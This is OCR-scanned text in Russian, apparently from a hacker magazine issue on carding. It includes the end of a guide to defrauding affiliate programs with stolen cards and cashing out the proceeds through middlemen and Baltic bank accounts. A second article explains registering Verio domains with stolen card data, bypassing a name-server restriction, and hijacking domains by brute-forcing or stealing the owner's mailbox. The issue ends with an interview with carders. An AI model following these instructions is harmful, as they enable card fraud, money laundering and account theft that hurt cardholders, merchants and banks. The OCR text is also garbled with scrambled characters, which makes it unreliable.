туп к базе анонимных прокси будет 
стоить в месяц $60. 


Но и это еще не все. Что подумает 
партнер, когда обнаружит, что из 
трех пользователей в день, заходя- 
щих к тебе на сайт, все тут же клика- 
ют на баннер и покупают его услуги? 
Ситуация очень странная. Могу ска- 
зать сразу, что письма партнеру с 
лестными отзывами о баннерах, име- 
ющих КПД 100%, вряд ли его убедят. 
Значит - наш сайт должен иметь хо- 
рошую посещаемость, или хотя бы 
делать вид, что он ее имеет. В Cpeg- 
нем КПД баннера - 01%, так что не 
будем отступать от этого правила - 
на каждый вбив создавай трафик 
около 1000 пользователей. Сделать 
это можно по-разному. Можно само- 
му написать скрипт, можно найти 
бесплатные скрипты в интернете или 
купить. Но самый простой вариант - 
это купить траффик. Стоимость раз- 
ная, в среднем - $1 за 1000 посеще- 
ний. Люди, которые этим занимают- 
ся, называются трасрагонами, и их 
всегда можно найти на тех же карде- 
рских форумах. 


Если все вышеперечисленное у тебя 
есть, можешь начинать работать. 
Сколько карт в день вбивать - зави- 
сит от твоей наглости. Если ты будешь 
вбивать по 1-2 сс в день, это будет 
вполне нормальный вариант. 


Итак, для успешного вбива 
необходимо: 


©. Иметь карты. 

©. Иметь прокси того же штата, что 
и карта. 

@. Нагнать трафик на свой сайт. 


ЗАБИРАЕМ КЕШ ИЛИ TOHKOC- 
ТИ ОБНАЛА 

и Допустим, все прошло успешно, и 
ты работаешь уже месяц. Естествен- 
но, пора подумать о том, как забрать 
свои деньги, пока не пошли чарджбэ- 


ки. Если твой партнер высылает день- 
ги на WebMoney или E-Gold, то все 
очень просто - достаточно зарегист- 
рировать аккаунт в нужной системе и 
перечислять туда деньги. Как обнали- 
чить Webmoney, я думаю, все знают, 
об этом подробно написано на их сай- 
те. В случае с E-Gold пугаться тоже не 
стоит. В интернете много контор, зани- 
мающихся обменом - о них ты прочи- 
таешь в статье "8 хитрых способов 
обнала денег с кред". 

Сложнее, если тебе будут перечис- 
лять сумму посредством банковского 
перевода. Хотя вся сложность состо- 
ит в том, что придется найти нальщи- 
ка. Как всегда, найти его можно на 
кардерских форумах. Нальщик возь- 
мет с тебя процент (какой именно - 
ты договоришься с ним). Также при- 
дется договориться и о том, как тебе 
удобнее будет получить деньги. На- 
gO сказать, что обналичивание денег 
- один из самых главных моментов. 
Прежде чем обращаться к нальщику, 
стоит посмотреть его рекомендации. 
Если нальщик хороший, то люди, ра- 
ботавшие с ним, обязательно оста- 
вят о нем отзывы. Тут может возник- 
нуть проблема: обычно нальщику, 
особенно если он просри, не очень 
выгодно работать с суммами меньше 
$1000. Поэтому меньшую сумму он 
может и не принять. В этом случае 
можно действовать по-разному: мож- 
но все же уговорить его принять 
$500, а можно просто подкопить 
еще денег на счету. 


Кстати, с нальщиком лучше догово- 
риться заранее, еще до подключе- 
ния к партнерской программе. Дело 
в том, что счет, на который будут ид- 
ти твои деньги, возможно, придется 
указывать во время регистрации. 
Лучше, если все будет готово зара- 
нее. Это избавит от непредвиденных 
сюрпризов. 


Для обналичивания подойдет обыч- 
ный счет где-нибудь в Латвии. При 
особом желании и наличии лишних 
денег счет можно открыть самому, а 


можно купить уже готовый. Большинство прибалтийских 
банков могут открыть счет без личного визита к ним. Для 
этого тебе понадобятся ксерокопии некоторых документов 
(каких именно - зависит от банка). После чего их надо пос- 
лать по почте или по факсу. Если все пройдет удачно, то 
ты получишь конверт, в котором будет дебетная карта 
(Visa Electron или Cirrus/Maestro) с пин-кодом, а также 
инструкции для онлайнового управления счетом. Такой 
счет будет очень полезен и в дальнейшем. Он обязатель- 
но окупится, если, конечно, не запороть его после первого 
же перевода. Кроме того, теперь уже не придется отдавать 
проценты нальщику, и появится возможность обналичи- 
вать суммы меньше $1000. 


В правилах партнера необходимо внимательно прочитать, 
в какие страны он может делать переводы. Если этого нет в 
правилах, придется написать письмо в службу поддержки и 
спросить об этом. Может оказаться, что они переводят 
деньги только в пределах США или другой страны. 


В общем, для обналичивания денег нужно: 


Ф. Иметь счет для обнала (свой или предоставленный 
нальщиком). 

©. Иметь необходимую сумму на счету у партнера. 

@. Превысить первоначальный холод (если он есть). 


ОДНИМ ВЫСТРЕЛОМ ДВУХ ЗАЙЦЕВ 

Если все было сделано правильно, то уже через месяц- 
полтора в твоем кармане осядет некоторая сумма денег. 
Как долго будет работать проект - зависит только от тебя и 
от жадности кардхолдеров. За месяц проект может легко 
окупиться, плюс принести некоторую прибыль. Дальше все 
деньги будут идти уже тебе в карман. Но, как всегда, денег 
хочется больше. И это, в принципе, не проблема. 


Допустим, ты рекламируешь хостинг своего партнера. А за- 
чем выбрасывать на помойку честно накарженный товар? 
Куда более разумным решением будет продать этот хос- 
тинг, например, в два раза дешевле. Попробуй найти лю- 
дей, которым он будет нужен. Если продавать его на Kapge- 
рских форумах, то лучше сразу предупредить покупателя, 
что товар скаржен, чтобы избежать дальнейших разборок. 
Лучше будут продаваться темплейты, т.к. они уже есть и их 
не закроют, как, например, хостинг. Самое выгодное - это, 
как я говорил, dedicated servers. Их можно использовать и 
в своих целях. 


И В ЗАКЛЮЧЕНИЕ... 

Я постарался показать, что кардинг - это все же твор- 
ческий процесс. Главное верить в свои силы, и тогда все 
должно получиться. Сначала все кажется очень сложным, 
но если потратить немного времени, то картина быстро про- 
ясняется. Конечно, на пути тебя будут подстерегать неожи- 
данности, но рассказать обо всех невозможно. Связанно 
это с тем, что многое меняется очень быстро, да и в каждой 
компании свои правила и порядки. Думаю, многие меня 
осудят, сказав, что кардинг - это противозаконно и амо- 
рально. Совершенно с этим согласен, поэтому никого не 
призываю заниматься чем-то подобным. ГЕ 
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САМЫЙ ПРАВИЛЬНЫЙ ХОСТИНГ 


colts bith) 


юбой кардер должен иметь ряд незаменимых вещей. Это кредитка, хороший хостинг (чтобы дурить наивных буржуев) и, 

конечно же, домен. Домен - это не пустой звук и предмет понтов. Именно звучное имя проекта притягивает к себе новых 
клиентов и вызывает уважение к его владельцу. Разумеется, чтобы не иметь никаких проблем после регистрации домена, 
следует уделить большое внимание двум вещам. Во-первых, названию домена, которое, как я уже сказал, имеет огромное 
значение. А во-вторых, грамотно выбрать хостинг, который предоставит любителю картона заветное имя второго уровня. 


СКАЗАНИЕ 


0 ХОСТИНГАХ 


m Как уже было ска- 


Компании, 
предостав- 
ляющие по- 
добные ус- 
луги, делят- 
ся на нес- 


колько ви- 
дов: те, ко- 
торые про- 
писывают 
имя на 
собственном 
сервере и 
предостав- 
ляют вла- 
дельцу оп- 
ределенные 
права 
(FTP/WEB/ 
SSH goc- 
туп), a так- 
же дающие 
только зону 
для домена. 


На главной 
странице с 
правой сто- 
роны ты 
увидишь 
небольшую 
форму. 
Вводи туда 
желаемое 
имя домена 
и жми 
"Check 1". 
Тебя пере- 
кинет на 
первую сту- 
пень реги- 
страции - 
выбор go- 
мена. 


зано, необходимо выб- 
рать хороший хостинг, 
чтобы зарегистрировать домен. Ком- 
пании, предоставляющие подобные 
услуги, делятся на несколько видов: 
те, которые прописывают имя на 
собственном сервере и предоставля- 
ют владельцу определенные права 
(FTP/WEB/SSH доступ), а также даю- 
щие только зону для домена. При 
этом первичный и вторичный DNS- 
серверы должны являться собствен- 
ностью клиента. Существует и третий 
вариант - золотая середина, хостинг, 
позволяющий переносить зоны на 
другой ОМ№$-сервер. Таким является 
знаменитый Www.verio.net. Об этой 
компании и пойдет речь в этой статье. 


Вообще, альтернатив Verio очень 
много - тот же www.register.com. Ho 
все они, как правило, замораживают 
домен при отрицательном балансе на 
кредитке. В случае с Верио этого не 
происходит - домен умирает лишь по 
истечении периода существования 
зоны. А его, как известно, можно 
продлить без особых проблем ;). К то- 
му же, если бабки на карте закончат- 
ся, Verio оставит клиенту не только 
домен, но и панель управления, где 
можно выполнить ряд действий: изме- 
нить зону, добавить почтовый акка- 
унт, выполнить апгрейд плана, пос- 
мотреть статистику и многое другое. 
Об этом я обязательно расскажу, но 
всему свое время. 


РЕГИСТРАЦИЯ - ДЕЛО ТОНКОЕ 
м Итак, ты проникся и захотел стать 
клиентом Verio ;). Ты выбрал правиль- 
ный путь, ведь если домен будет за- 
регистрирован с учетом следующих 
советов, никаких проблем не будет. 
Для успешной регистрации тебе по- 
надобится рабочая (читай - с положи- 
тельным балансом) кредитная карта с 
наличием Cvv2 (специального защит- 
ного кода) и немного терпения. К сло- 
ву о кредитке, совсем недавно Verio 
была чуть пи не единственной компа- 
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нией, регистрирующей домены без 
cvv2-koga. Теперь все изменилось, и в 
форму было добавлено соответству- 
ющее поле. Но такому кардеру, как 
ты, достать Cvv2, я думаю, будет нес- 
ЛОЖНО. 


На главной странице с правой сторо- 
ны ты увидишь небольшую форму. 
Вводи туда желаемое имя домена и 
жми "Check it". Тебя перекинет на 
первую ступень регистрации - выбор 
домена. В случае если имя будет сво- 
бодно, появится сообщение, иначе 
высветится форма для выбора аль- 
тернативного домена. 


Когда имя будет определено, насту- 
пает второй шаг регистрации - выбор 
плана хостинга. Тебе будет предло- 
жено два варианта - купить зону 
только для "парковки", либо выбрать 
специальный план для нее. LLlenkan 
по второму пункту и попадешь на 
страницу с выбором типа регистра- 
ции. Советую выбрать UNIX GOLD 
PLAN. Пусть он и дорогой (около 
$100 за месяц), но проблем с перено- 
сом зон у тебя точно не будет. Хотя 
сложностей не будет при любом пла- 
не, так как существует один секрет, 
позволяющий обманывать защиту 
компании. Когда действия будут nogT- 
вержодены, у тебя спросят личные 
данные. Из них ты, конечно же, зане- 
сешь только свой е-тай, остальные 
сведения будут о владельце карты. 
Кстати, за этим адресом будет зак- 
реплен твой личный аккаунт Ha Verio 
- при вторичной регистрации домена 
тебе потребуется лишь ввести свой 
пароль и/или инору о новой кредитке. 


На предпоследнем шаге кардеру 
предстоит занести информацию о 
карте - на этом я не буду останавли- 
ваться, так как такие операции ты 
производишь очень часто. 


Ну и, наконец, для завершения сдел- 
ки, подтверди свою покупку и получи 
благодарность oT Verio. Компания по- 
обещает отправить тебе письмо пос- 
ле проверки кредитной карты. Теперь 
один нюанс: если ты получаешь два 
письма с промежутком около 10 минут 
- все отлично, запрос прошег, и go- 
мен забит за тобой (первое письмо 
содержит запрос о регистрации, вто- 
рое - правила хостинга). В противном 
случае - карта невалидна, и придется 
производить новую сделку. 


Через день на твой ящик придет 
еще одно письмо, на этот раз с дан- 
ными о твоем домене. Теперь мо- 
жешь прыгать от радости и ждать, 
пока обновятся зоны и твой домен 
будет откликаться на запросы ;). По- 
началу довольствуйся 1Р-адресом, 
за которым закреплен личный ЕТР- 
доступ и панель управления именем. 
В довесок к этому будут предостав- 
лены DNS-cepBepbl и правила поль- 
зования хостингом. 


ПРЕЛЕСТИ CONTROL PANEL 

m Теперь можно проверить работу 
Control Panel и залогиниться под вы- 
данным аккаунтом. Панелька нахо- 
дится по адресу п 'р://1р-а90ге$$/51а{5/. 
Для доступа к ней выдается 6-знач- 
ный логин, который является частью 
твоего домена (например, для 
www.supercard.to логин будет 


superc). Пароль генерируется из 8 
случайно взятых символов. 


Когда будешь внутри, не помешает 
сменить пароль на более удобный 
(но не менее сложный). Это делается 
во вкладке Change Password. Теперь 
самое время заняться раздачей е- 
mail аккаунтов. Если ты взял себе 
план выше, чем DNR (Domain 
Registration Only), то тебе будут пре- 
доставлены от десяти аккаунтов по 
POP3/IMAP, а также доступ к SMTP. 
Чтобы добавить новую РОРЗ-запись, 
перейди в соответствующий раздел и 
задай пользователю логин и пароль. 
После этого жми Change, и аккаунт 
успешно добавится в базу. 
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Добавление новых е-тай записей. 


Иногда приходится добавлять реди- 
рект-запись, то есть адрес, с которого 
пришедшие письма будут автомати- 
чески пересылаться на указанный в 
форме мыльник. С этим ничего слож- 
ного, надо лишь чуть выше отметить 
значение сформы, названное "All 
email not specifically forwarded will be 
sent to". В случае если аккаунта не 
существует, все письма будут автома- 
тически пересылаться на этот адрес. 
Это очень удобно и позволяет пол- 
ностью контролировать почтовую 
систему твоего домена. 


Для работы с e-mail существует при- 
ятная оболочка Webmail. Раньше она 
входила в любой хостинг-план на ха- 
ляву, теперь же за нее просят 10 аме- 
риканских президентов ежемесячно 
(нашли, на чем нажиться ;)). Но стоит 
сказать, что скрипты Webmail сделаны 
на ура - в них существует все, что 
пригодилось бы рядовому пользова- 
телю. Ссылка Ha Webmail - www.super 
card.to/webmail/ либо http://webmail.super- 
card.to/. 


w ми 


Также присутствует интересный раз- 
дел "Domain Manager", который нахо- 
дится вверху на панели инструмен- 
тов. Там можно без проблем зареги- 
стрировать виртуальный домен. Он 
будет подвязан к главному, а оплата 
будет производиться по этой же кар- 
точке. Таким образом, просто запол- 
ни форму регистрации и не заботься 
об оплате имени - все произойдет ав- 
томатически. Кстати, процедура реги- 
страции займет минимальное время, 
так как необходимо лишь поставить 
галочку, подтверждающую, что кли- 
ент ознакомлен с правилами хостин- 
га, а затем аккуратно заполнить спи- 
сок новых имен и срок регистрации 
(от года до десяти лет). Если все сде- 
лано правильно и домен не занят - 
тебя попросят подождать денек, пока 
обновятся зоны. Особых проблем с 
созданием виртуального домена нет. 
Кстати, изменить, а тем более пере- 
нести зону такого виртуального име- 
ни тебе не удастся. Придется доволь- 
ствоваться разделом Edit Pointers. 
Там возможна лишь подвязка опре- 
деленного хоста к IP-agpecy (co3ga- 
ние домена третьего уровня). 


Создаем новый виртуальный домен 


СОЗДАНИЕ СВОИХ ДОМЕНОВ 

и Когда ты получаешь полный дос- 
туп к зоне своего домена, то появля- 
ется возможность создания своих 
сабдоменов (уже третьего уровня), а 
также других весьма полезных полей 
DNS. Все это можно сделать во вклад- 
ке "Zone File Editor", которая находбит- 
ся в первом пункте управления 
"Manage Му Web site". 


Заходи туда и увидишь срайл, в KOTO- 
ром прописаны минимальные поля. В 
первую очередь, это SOA. Там нахо- 
дятся два e-mail адреса Postmaster'a и 
Hostmaster'a. Затем следует порядко- 


VERIO - ДАЛЕКО НЕ ЕДИНСТВЕННАЯ КОМПАНИЯ, 
ПРЕДОСТАВЛЯЮЩАЯ УСЛУГУ РЕГИСТРАЦИИ ДОМЕНА 
ВТОРОГО УРОВНЯ. ВОТ КРАТКИЙ СПИСОК ПОДОБНЫХ 


СЕРВЕРОВ. 


Ш www.networksolutions.com - регистрация доменов в зоне .сот, 
„пе, .org. 
Ш www.register.com - .com, .net, .org, а также .biz и .info. 

Ш www.tonic.to - обслуживание доменов в зоне .to. 

Ш www.inc.ru - единственный ресурс по оформлению доменов .ги. 


вый номер, время обновления и дата 
истечения срока зоны. Чуть ниже 
файла ты увидишь форму для новых 
записей, которую необходимо запол- 
нить. Существует несколько парамет- 
ров, разрешенных для добавления. 
Вот некоторые из них: 


А. Нужен для подвязки нового сабдо- 
мена к |Р-адресу. Например, запись sub- 
domain.supercard.to. IN А 127.0.0.1 будет 
означать, что имя будет ссылаться Ha 
локальный адрес. Кстати, точка в конце 
сабдомена обязательна - она означает 
конец записи (в противном случае ag- 
рес будет иметь вид зибаотат.зирег- 
card.to.supercard.to, то есть присоеди- 
няться к главному имени). 


СМАМЕ. Параметр позволяет созда- 
вать алиас gna уже существующего 
имени. К примеру, admin.supercard.to. 
IN CNAME supercard.to. будет привя- 
зывать сабдомен к главному хосту, 
делая эти записи равнозначными. 


МХ. Расшифровывается этот пара- 
метр как Mail eXchanger. Все SMTP- 
службы работают со значением оп- 
ции, предварительно запрашивая его 
с сервера имен. Это удобно, посколь- 
ку делает постоянным хост с работаю- 
щим на нем Smtpd для каждого доме- 
на. Пример использования: 


smtp.supercard.to. IN МХ 10 
222.222.222.222. 


Число 10 означает приоритет записи, 
соответственно, полей МХ может быть 
несколько. 


№. Самая интересная опция, пос- 
кольку ее значение - NS-cepBep для 
данного домена. Как я уже говорил, 
некоторые хостинги позволяют пере- 
носить записи с одного сервера на 
другой. Verio не исключение, но тут 
существует один нюанс. Дело в том, 
что если ты выбрал план ОМК, изме- 
нить №5-сервер тебе не удастся (сце- 
нарий выругается на неверный план 
регистрации). Все было бы плохо, ес- 
ли бы не один трюк, позволяющий 
обмануть эту защитную систему. В 
случае, когда адрес NS-cepBepa со- 
держит подстроку "verio", запрос об- 
работается как надо, а адрес запи- 
шется в базу. Реализуется на прак- 
тике это очень просто: в конориге к 
твоему серверу приписывается сле- 
дующая строка: 


verio.cardns.net. IN A 222.222.222.222, 


rge 222.222.222.222 - |Р-адрес сервера. 
После этого (когда зоны обновятся, а 
хост будет виден из глобала) можешь 
смело переносить ОМ№$-сервер. Запол- 
няем форму следующим образом: 


supercard.to. IN NS verio.cardns.net. 


» 


Панелька 
находится 
по адресу 
http://ip- 
address/stat 
s/. Для goc- 
тупа к ней 
выдается 6- 
значный ло- 
rH, кото- 
рый являет- 
ся частью 
твоего go- 
мена (нап- 
ример, для 
ммм. зирег- 
card.to no- 
гин будет 
superc). 


Когда ты 
получаешь 
полный goc- 
туп к зоне 
своего go- 
мена, появ- 
ляется воз- 
можность 
создания 
своих саб- 
доменов 
(уже треть- 
его уровня), 
а также 
других 
весьма по- 
лезных по- 
лей DNS. 
Все это 
можно сде- 
лать во 
вкладке 
"Zone File 
Editor", ко- 
торая нахо- 
дится в 
первом 
пункте уп- 
равления 
"Мападе Му 
Web site". 


В случае, 
когда адрес 
NS-cepBepa 
содержит 
подстроку 
"verio", зап- 
рос обрабо- 
тается как 
надо, а адрес 
запишется в 
базу. 


Брешь в бе- 
зопасности 
Verio будет 
на пользу 
кардеру, 
так как при 
выборе пла- 
на DNR, он 
может без 
проблем пе- 
ретащить 
зоны на от- 
дельный 
сервер и ра- 
доваться 
жизни. 


Как и лю- 
бой хостинг, 
Verio nog- 
держивает 
продление 
времени ре- 
гистрации. 
Иными сло- 
вами, когда 
у тебя за- 
канчивается 
период, на 
который ты 
покупал до- 
мен, можно 
с легкостью 
его npog- 
лить. 


ДОМЕН ДЛЯ РЕАЛЬНОГО КАРДЕРА | 


Verio проглотит такой запрос, и через 
день зоны перенесутся на твою маши- 
ну. Естественно, ты должен будешь 
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Простая оболочка для редактирования 
зоны 


позаботиться об этом заранее и сос- 
тавить конфиг для своего домена (он 
может совпадать с тем, что ты редак- 
тировал Ha Control Panel). 

Стоит рассказать и об оформлении 
прямой зоны домена (именно она и бу- 
дет переноситься на посторонний сер- 
вер). Для этого необходимо задать в 
главном Named.conf информацию о 
местонахождении и значении зоны. Это 
Делается следующим блоком данных: 


zone "supercard.to" { 
type master; 

file "supercard.to.hosts": 
allow-query { any; }; 

hi 


Здесь имя зоны - любое название 
(лишь бы ты понял, к чему ведет этот 
блок), тип - предназначение DNS, mas- 
{ег или slave (во втором случае необ- 
ходимо создать внутренний блок с 
masters-cepBepamn). И, наконец, allow- 
query обрабатывает запросы от KOHK- 
ретных адресов (в нашем случае лю- 
бой может запросить данные о доме- 
не). Параметров в блоке zone { } мо- 


Пример рабочего конфига 


жет быть много, каждый из них отве- 
чает за определенную вещь. За под- 
робностями иди в man named.conf. 
Теперь можно создавать сфайл зирег- 
card.to.hosts, который, как я уже гово- 
рил, не отличается от зоны на 
verio.net. Ты лишь можешь изменить 
первый параметр STTL, который озна- 
чает период, за который обновляются 
зоны. К примеру, его значение Id го- 
ворит о том, что каждый день будет 
происходить синхронизация. Также 


ВОПРОСЫ? 


Ш Control panel на Verio.net 
снабжена множеством ссылок 
на Нер. Например, можно 
найти помощь по каждому 
хостинг-плану, FTP-goctyny, 
webmail, виртуальным 
доменам, зонам и T.g. Кроме 
того, как утверждают на 
главной странице, любые 
вопросы, заданные по мылу, 
обязательно будут разрешены 
в короткие сроки. 


допустимо указывать время в секун- 
дах. После всех модификаций консори- 
гурационного срайла bind, необходимо 
перезапустить демон. Для этого пош- 
ли процессу сигнал 1: killall -1 named. 


Брешь в безопасности Verio будет Ha 
пользу кардеру, так как при выборе 
плана DNR, он может без проблем пе- 
ретащить зоны на отдельный сервер 
и радоваться жизни. 


TXT, SRV. Текстовые и служебные 
записи, которые могут быть внесены 
для разъяснения какой-либо инфор- 
мации. Так, например, можно уточнить 
некоторые электронные адреса. На 
них можно слать почту в определен- 
ных случаях (Spam, Abuse и т.п.). 


Последнего параметра РТК, органи- 
зующего обратный резолв (IP-agpec 
в hostname), ты He обнаружишь. Это 
обусловлено тем, что вторая зона 
хранится у Verio и держится в стро- 
гом секрете ;). Ты же вполне можешь 
обойтись без РТК, создавая свои 
красивые виртуальные хосты (пусть 
даже в одну сторону) с использова- 
нием опции А. 
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Один из многочисленных разделов 
помощи 


После такого описания параметров 
тебе несложно будет разобраться в 
прописке опций или переносе зон. 
Кстати, перенести их будет вполне ло- 
гично, так как при отрицательном ба- 
лансе на карте, Verio просто заблоки- 
рует FTP и WEB-goctyn к сайту (оста- 
нется только Control Panel). Все изме- 
нения в зонах будут немедленно отп- 
равлены на е-тай (под которым был 
зарегистрирован домен). Кстати, не 
забудь подтвердить редактирование. 
Это будет предложено сделать при 
нажатии Ha Submit. 


ПРОДЛЕНИЕ АККАУНТА 
И АПГРЕЙД ПЛАНА 

m Как и любой хостинг, Verio поддержи- 
вает продление времени регистрации. 
Иными словами, когда у тебя заканчива- 
ется период, на который ты покупал go- 
мен, можно с легкостью его продлить. 
Возможно, потребуется найти другую 
кредитную карту. Для этого необходимо 
выбрать вкладку "Update Method" в раз- 
gene Billing твоей панели управления. Да- 
лее определить новые сроки и пропла- 
тить кредиткой с положительным счетом. 
С апгрейдом плана все немного слож- 
нее. Именно поэтому я советовал вы- 
бирать его сразу при регистрации. 


Как и любой хостинг, 
Verio поддерживает продление 
времени регистрации 


РАБОТА С DNS 


Ш Для проверки работоспособности зон нередко приходится поль- 
зоваться утилитой host. Вот полезные опции, которые могут тебя 


заинтересовать: 


host -1 hostname - выводит полный список сабдоменов, подвязан- 
ных к hostname. 
host -{ ТУРЕ hostname - выводит значение параметра TYPE, кото- 
рый может иметь значение МХ, NS и gp. Обо всех опциях было nog- 
робно рассказано. 
host hostname - выполнить преобразование hostname в |Р-адрес. 


Exuting Cred Can] Information 
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Вот что получилось в моем случае, когда я выбрал Silver 
Plan и захотел поменять его Ha Gold. Как выяснилось, для 
этого нужно было написать письмо администратору Verio с 
запросом. Затем мне пришел ответ, что моя карта истекла, 
и теперь мне нужно отправить ему новые данные. Все было 
выполнено по указанию, но вот ответ администратора меня 
шокировал. Для того чтобы проапгрейдить план, мне надо 
было позвонить по телефону в Штаты и подтвердить голо- 
сом данные о кредитке. Я забил на это дело и остался с се- 
ребряным планом. Думаю, ты бы поступил так же. 


Как уже было написано, через два месяца при отрицатель- 
ном счете Verio отрубит у тебя доступ к FTP и Web. Точнее, 
сотрет все твои каталоги и срайлы, сам же вход будет воз- 
можным ;). Чтобы успеть забэкапить всю важную информа- 
цию, просто следи за почтовым ящиком - за три дня до со- 
бытия тебе упадет письмо, в котором будет написано об 
отключении аккаунта. 


зы 


ЗАБЫЛИ ПАРОЛЬ? 

m Всякое может случиться, и запамятовать пароль на 
Control Panel может любой человек. Verio имеет автомати- 
ческую систему высылки подобной информации. 

При логине на \\еб-админку ты увидишь стандартный зап- 
рос пароля от Apache. Если его ввести неверно три раза, 
сервер переведет тебя на страницу 403. Помимо ругани о 
неверном пароле, ты найдешь ссылку, ведущую на скрипт 
высылки забытого пароля. Никакой контрольной фразы и 
дополнительных данных - просто нажми "Send", и инора уй- 
дет на твой мыльник (за которым закрепляется домен). 
Кстати, тут может возникнуть ряд идей, о хищении домена у 
владельца. Достаточно намутить простой POP3-6pytcpopc 
(либо просто увести мыло, на которое регился домен) и зап- 
росить данные на него - все, имя твое! Правда, учитывай, 
что хозяин запросто может его вернуть ;), но ничто не ме- 
шает тебе выслать пароль во второй раз. 


ВСЕМ СПАСИБО, ВСЕ СВОБОДНЫ! 

и Любой хостинг можно описать подобным образом. У 
каждого есть свои достоинства и недостатки, я это говорю 
с полной уверенностью, так как был клиентом пяти раз- 
личных компаний. И этой статьи не было бы, если бы Verio 
не оправдал все мои ожидания. Конечно, у него есть свои 
минусы, так как идеального хостинга не существует, но 
сохранение всех зон и доступа к Control Panel после исте- 
чения срока кредитки меня весьма порадовало. Это не ос- 
тавит равнодушным и тебя, ведь любой кардер не любит 
таких глобальных проблем, как утеря домена. Я думаю, ты 
не исключение. ae 


издательство (gamejland представляет 


= Который ты ждал! 
38 О котором ты мечтал!! 


389 Который станет твоим верным другом!!! 


3 Никакого мусора и невнятных тем - нас- 
тоящий геймерский рай, более двухсот стра- 
ниц, посвященных только играм на РС. 


№ 208 страниц информации 

№ Сотни игр в каждом номере 

ш DVD-anck (4,7 Гбайт!!!) с тщательно подобранным содержимым 
№ Читы, прохождения и грязные трюк 

№ Двусторонний постер и геймерские наклейки 


m Снимаем сливки - более двух десятков убойных материалов, 
среди которых: подробнейший рассказ о Doom Ш, Half-Life 2, 
Мах Payne 2, Neuro, PainKiller, World of Warcraft, The Sims 2 

и Киберспорт - на кону десятки тысяч долларов. 

Как их получить? 

и Ставим точку в вопросе насилия в компьютерных играх! 

и Обзор всех новинок российского рынка - 
как не ошибиться в выборе? 


В продаже с 4 декабря! 


ПРАВИЛЬНЫЙ ЖУРНАЛ О 
КОМПЬЮТЕРНЫХ ШГРАХ! 
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mindwOrk (mindwO 


КАРДИНЕГ = 


ЗАНЯТИЕ ДЛЯ ДЕБИЛОВ 


ИНТЕРВЬЮ С ЖИВЫМИ КАРДЕРАМИ 


ее 


акие-то зашуганные люби эти кардеры. Стучишься к ним в асю, предлагаешь интервью провести, объясняешь, 
что приватная инфа тебе на фиг не впала, что хочется просто поговорить "за жизнь". Так нет, плотно 
морозятся. Begb я, возможно, полковник Мусоров из ФБР, сплю и вижу, как засадить всех на нары :). 


ороче, нервов мне по- 


портили изрядно. Но 


мир не без добрых лю- 


Вообще я 
не собирал- 
ся стано- 
виться кар- 
дером, 
просто 
знал, что 
есть такие 
люди. Но 
как-то друг 
навел на 
один из 
кардерских 
форумов. 
Сначала по- 
читал из 
любопыт- 
ства, потом 
решил поп- 
робовать. 
Купил на 
свои деньги 
информа- 
цию о нес- 
кольких 
кредитных 
картах, и 
пошло-пое- 
хало. 


Квартиры 
меняют 
только па- 


раноики. 
Инфу дове- 
ряю. Гораз- 
до важнее 
не болтать 
о своем за- 
нятии нап- 
раво и на- 
лево всяким 
друзьям- 
знакомым. 


дей. На мое предложе- 
ние откликнулись двое 
(настоящие имена и ники, естествен- 
но, не публикуются - прим. peg.). 


XS: Сколько времени ты уже зани- 
маешься кардингом? Расскажи о 
том, как и почему ты в это втянул- 
ся? Каким было первое дело, кото- 
рое ты провернул? 

cos: Серьезно занимался вещевым 
кардингом около года, 4 месяца назад 
бросил. Первой вещью, которую выс- 
лали, был простенький цифровой ‹ро- 
тик. Радовался тогда, как слон. 
Вообще я не собирался становиться 
кардером, просто знал, что есть такие 
люди. Но как-то друг навел на один из 
кардерских форумов. Сначала почи- 
тал из любопытства, потом решил 
попробовать. Купил на свои деньги 
информацию о нескольких кредитных 
картах, и пошло-поехало. 

Бросил кардинг из-за того, что ме- 
ня кинули подряд два человека. 
Кинули на дорогую электронику, 
которую я заказал, а долю свою не 
получил. У меня просто опустились 
руки, не хотелось дальше продол- 
жать. Кардинг на самом деле очень 
нервное занятие. 


XS: Насколько серьезно ты забо- 
тишься о своей privacy? Например, 
меняешь ли ты квартиры в целях 
конспирации? :) Доверяешь ли при- 
ватную инфу проверенным людям? 
cos: Квартиры меняют только парано- 
ики. Иноу доверяю. Гораздо важнее 
не болтать о своем занятии направо и 
налево всяким друзьям-знакомым. 

ВГ: Достаточно понимать, что ты де- 
лаешь, и как это может повлиять на 
твое дальнейшее будущее. 
Например, это интервью... По-мое- 
му, получилось хорошее размыш- 
ление вслух ни о чем :). Для меня 
не существует проверенных и не 
проверенных людей. Есть друзья, и 
есть те, с кем у меня только дело- 
вые контакты. 
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XS: Как, по-твоему, кардинг - это 
однозначно воровство или увле- 
ченность знаниями об устройстве 
платежных систем? :) 

dos: Кардинг - такое воровство, кото- 
рое не имеет явной направленности 
против человека. Убытки от кардеров 
терпят банки и интернет-магазины, но 
не конкретные люди. 

ВГ: Термин придумал не я. И тот, кто 
его придумал, дал конкретное ему 
объяснение. Кардинг - махинации при 
помощи кредитных карт и всего, что 
имеет к ним отношение (именно поэ- 
тому всех, кого судили за кардинг, су- 
дили по статье за мошенничество, а 
не за воровство). 


XS: Есть ли у тебя легальная рабо- 
та? Если да, расскажи о ней, если 
нет - почему не устроишься, и кем 
бы ты предпочел работать? 

dos: Учусь в вузе на первом курсе. В 
будущем работа будет связана с за- 
щитой информации. Вполне возмож- 
но, что информацию придется защи- 
щать от тех же кардеров. 

ВГ: Легальная или наемная? Легаль- 
ная есть, а наемная (когда работаешь 
в какой-то компании) была, даже нес- 
KOMbKO, HO... 

Вообще, я с радостью трудоустро- 
юсь, когда в нашей стране начнут 
оплачивать труд должным обра- 
зом, а не по 800-1500 долларов в 
месяц при 10-часовой занятости. 
При этом твой начальник ездит 
каждый день на новых шестисотых 
и семерках, а его сын, работающий 
с тобой же, но по 2-часовому днев- 
ному графику и 2-3 дня в неделю 
из пяти, получает 5000 долларов. 
И то "на мороженое". 

Предпочел бы работать в какой-ни- 
будь из спецструктур. Например, на 
букву Ф :). 


XS: Насколько сложно сейчас 
быть кардером? Какими знаниями 
и качествами нужно в первую 
очередь обладать? Какова специ- 
фика современного кардерства, 
изменилось ли что-то по сравне- 
нию с прошлыми годами? 


dos: Сейчас кардинг переживает не 
самые лучшие времена. Знания зави- 
CAT от направления кардерства. Если 
это интернет, то надо уметь хорошо 
организовать защиту и анонимность. 
Если это реальный кардинг, то очень 
кстати приемы НЛП и обаяние :). 

ВГ: Ничего не изменилось. Кардер- 
ство всегда было занятием аля деби- 
лов. Это не хакерство, где нужны зна- 
ния в области операционных систем и 
программирования. В кардерстве не 
нужно иметь каких-то специализиро- 
ванных знаний. Большинство "ны- 
